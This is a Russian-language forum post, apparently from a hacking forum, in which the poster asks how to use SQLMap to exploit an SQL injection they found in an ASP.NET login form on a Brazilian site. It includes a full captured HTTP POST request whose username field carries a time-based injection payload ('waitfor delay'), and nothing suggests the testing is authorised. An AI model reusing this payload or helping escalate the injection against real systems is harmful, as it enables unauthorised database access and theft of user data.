Привет ребят, подскажите, нашел уязвимость POST (multipart)
Данные с окуня:
Как ее раскрутить через SQLMap правильно?
Данные с окуня:
Код:
POST /fabesul/Webforms/Login.aspx HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.target.br/
Cookie: ASP.NET_SessionId=elctbf553h2aasaqscspst55; ASPSESSIONIDCWASBQQA=BCOHOIGBNKFBJHPDHKNFKFDH
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Content-Length: 937
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: www.target.com.br
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="__EVENTTARGET"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="__EVENTARGUMENT"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUKLTY1ODc3NDM3MA9kFgJmD2QWAgIHD2QWAgIBD2QWAgIHD2QWAgIDDzwrAA0AZBgBBR9jdGwwMCRjcGhDb250ZXVkb0hvbWUkR3JpZFZpZXcxD2dk0KcgfP2ZMP2Atzryd9VPiCDEX8o=
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
E72D1389
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="__EVENTVALIDATION"
/wEWBAL96NbSAwKbzK2qCALcxqE6Ap2rqZIHB2y6ghemlfyuo0A2WvIir6ocX6k=
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctl00$cphConteudoHome$txtUser"
pHqghUmeEqkAAKa9'; waitfor delay '0:0:6' -- // Уязвимость
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctl00$cphConteudoHome$txtPassword"
LembrarSenha
------------YWJkMTQzNDcw--
Как ее раскрутить через SQLMap правильно?